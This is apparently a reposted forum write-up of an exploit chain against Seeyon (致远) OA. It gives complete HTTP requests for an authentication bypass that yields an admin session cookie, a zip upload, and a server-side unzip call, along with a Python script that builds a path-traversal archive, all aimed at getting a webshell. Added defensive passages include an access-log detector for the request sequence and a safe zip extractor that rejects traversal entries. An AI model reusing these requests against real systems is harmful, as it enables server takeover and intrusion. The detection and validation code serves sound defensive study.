Seeyon (致远) OA: a specially crafted request obtains a session, after which a webshell uploaded through the file upload interface gives control of the server
title="致远"
Process:
First, construct a request to obtain an administrative cookie value; then, carrying that cookie, upload a zip archive and have the server decompress it, which achieves getshell.
1. Obtain the cookie
POST /seeyon/thirdpartyController.do HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Content-Type: application/x-www-form-urlencoded
Host:
Content-Length: 112

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
2. Upload the archive
POST /seeyon/fileUpload.do?method=processUpload&maxSize HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
User-Agent: Java/1.8.0_101
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 975
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="type"

--00content0boundary00
Content-Disposition: form-data; name="extensions"

--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"

--00content0boundary00
Content-Disposition: form-data; name="destDirectory"

--00content0boundary00
Content-Disposition: form-data; name="destFilename"

--00content0boundary00
Content-Disposition: form-data; name="maxSize"

--00content0boundary00
Content-Disposition: form-data; name="isEncrypt"

--00content0boundary00
Content-Disposition: form-data; name="file1"; filename="test.zip"
Content-Type: application/x-zip-compressed

<zip file bytes>
--00content0boundary00--
After the archive is uploaded with the cookie, the response returns an id that identifies the archive.
Note: this is a huge pitfall. In actual testing, the file names inside the archive could only be digits, and anything above 10 could not be decompressed either; in addition, the archive sometimes must contain a layout.xml file (empty content is fine), otherwise decompression fails when the unzip vulnerability is exploited.
3. Decompress
POST /seeyon/ajax.do HTTP/1.1
Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Java/1.8.0_101
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 142
Connection: close

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2023-02-05","-6448544356250399451"]
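From the defender's side, the three requests above form a recognisable sequence: an unauthenticated POST to /seeyon/thirdpartyController.do, then a POST to /seeyon/fileUpload.do?method=processUpload, then a POST to /seeyon/ajax.do, all from one client within a short window. Only the request line survives in a typical access log (the POST body carrying method=access or managerMethod=uploadPageLayoutAttachment is not logged), so the detection below keys on the endpoints and their order. This is an added example and not code from the original post; the log lines are constructed, and the client addresses come from the documentation range 203.0.113.0/24.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access log in combined format. 203.0.113.5 walks the
# full chain; 203.0.113.9 is a normal user who only uploads an attachment.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Feb/2023:10:00:01 +0800] "POST /seeyon/thirdpartyController.do HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Feb/2023:10:00:03 +0800] "POST /seeyon/fileUpload.do?method=processUpload&maxSize HTTP/1.1" 200 98 "-" "Java/1.8.0_101"
203.0.113.5 - - [05/Feb/2023:10:00:04 +0800] "POST /seeyon/ajax.do HTTP/1.1" 200 45 "-" "Java/1.8.0_101"
203.0.113.9 - - [05/Feb/2023:10:05:00 +0800] "GET /seeyon/main.do HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Feb/2023:10:05:20 +0800] "POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1" 200 98 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# The stages of the chain in the order they must occur. Matching is on the
# path (and, for the upload, the query string) because POST bodies are not
# present in an access log.
STAGES = [
    ("auth_bypass", "POST", re.compile(r"^/seeyon/thirdpartyController\.do")),
    ("zip_upload", "POST", re.compile(r"^/seeyon/fileUpload\.do\?method=processUpload")),
    ("unzip", "POST", re.compile(r"^/seeyon/ajax\.do")),
]


def parse_log(text):
    """Parse combined-format lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        events.append({
            "ip": m.group("ip"),
            "ts": ts,
            "method": m.group("method"),
            "path": m.group("path"),
            "status": int(m.group("status")),
        })
    return events


def detect_chain(events, window=timedelta(minutes=10)):
    """Return (ip, stage_names) for every client that completed all stages in
    order, each step within `window` of the previous matching step, and each
    answered with a 2xx status. A client that only uses the upload endpoint
    (ordinary attachment handling) never reaches the last stage."""
    by_ip = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_ip.setdefault(ev["ip"], []).append(ev)

    alerts = []
    for ip, evs in by_ip.items():
        stage, last_ts = 0, None
        for ev in evs:
            # Too much time since the last matching step: the sequence is stale.
            if last_ts is not None and ev["ts"] - last_ts > window:
                stage, last_ts = 0, None
            name, method, pattern = STAGES[stage]
            if ev["method"] == method and pattern.search(ev["path"]) and 200 <= ev["status"] < 300:
                stage += 1
                last_ts = ev["ts"]
                if stage == len(STAGES):
                    alerts.append((ip, [s[0] for s in STAGES]))
                    stage, last_ts = 0, None
    return alerts


if __name__ == "__main__":
    for ip, stages in detect_chain(parse_log(SAMPLE_LOG)):
        print(f"ALERT {ip}: completed {' -> '.join(stages)}")
```

The upload endpoint on its own is legitimate traffic, so the rule only fires when the unauthenticated thirdpartyController.do request precedes it and the ajax.do call follows; tightening the window trades missed slow actors for fewer false positives.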
4. Check the upload result
Note: script that generates the archive
import zipfile

zf = zipfile.ZipFile('test.zip', mode='a', compression=zipfile.ZIP_DEFLATED)
fname = '..\\1.txt'  # entry name carrying a parent-directory component
shellcode = "c9b3995f-2d74-448d-a742-34f72cfa1e14"  # a marker string (a GUID) used to check the result
zf.writestr('layout.xml', "")  # the empty layout.xml the server-side unzip expects (see the note above)
zf.writestr(fname, shellcode)
zf.close()  # flush the archive to disk
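The archive above works because the server-side unzip writes entry names as given, so a name with a parent-directory component lands outside the intended directory. The check that prevents this is to validate every member name before extraction and to verify the resolved path again at write time. The following is an added, defender-side example and not code from the original post: it rejects the Windows-style `..\\1.txt` entry as well as `/`-separated and absolute names, and extracts a benign archive normally. The archives are constructed in memory inside the block.

```python
import io
import os
import posixpath
import tempfile
import zipfile


def build_zip(entries):
    """Build an in-memory zip from {name: bytes}. Constructed test input only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# An archive shaped like the one the script above produces, and a benign one.
TRAVERSAL_ZIP = build_zip({"layout.xml": b"", "..\\1.txt": b"marker"})
BENIGN_ZIP = build_zip({"layout.xml": b"<layout/>", "css/style.css": b"body{}"})


def unsafe_zip_entries(zip_bytes):
    """Return member names that would escape the extraction directory.

    Both '/' and '\\' are treated as separators: on a POSIX host a naive
    check would read '..\\1.txt' as a single ordinary file name, while the
    Windows server that later extracts it treats the backslash as a path
    separator. Absolute paths and drive letters are rejected as well."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            normalized = posixpath.normpath(name.replace("\\", "/"))
            if (normalized == ".." or normalized.startswith("../")
                    or posixpath.isabs(normalized)
                    or (len(name) > 1 and name[1] == ":")):
                bad.append(name)
    return bad


def safe_extract(zip_bytes, dest_dir):
    """Extract into dest_dir only after every member passes the name check,
    then re-verify each resolved target path before writing (defence in depth).
    Raises ValueError without writing anything if any member is unsafe."""
    bad = unsafe_zip_entries(zip_bytes)
    if bad:
        raise ValueError(f"refusing to extract: traversal entries {bad}")
    dest_root = os.path.realpath(dest_dir)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            rel = info.filename.replace("\\", "/")
            target = os.path.realpath(os.path.join(dest_root, rel))
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise ValueError(f"refusing to extract: {info.filename}")
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def extract_to_tempdir(zip_bytes):
    """Extract into a fresh temporary directory; return the relative paths written, sorted."""
    dest = tempfile.mkdtemp()
    written = safe_extract(zip_bytes, dest)
    return sorted(os.path.relpath(p, dest) for p in written)


if __name__ == "__main__":
    print("traversal entries:", unsafe_zip_entries(TRAVERSAL_ZIP))
    print("benign extracted:", extract_to_tempdir(BENIGN_ZIP))
```

The two checks are deliberately independent: the name check catches entries the extraction library might otherwise sanitise differently across platforms, and the realpath comparison catches anything that still resolves outside the destination (for example via a pre-existing symlink inside it).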
Reposted from: https://bbs.zkaq.cn/t/30787.html
Author: camer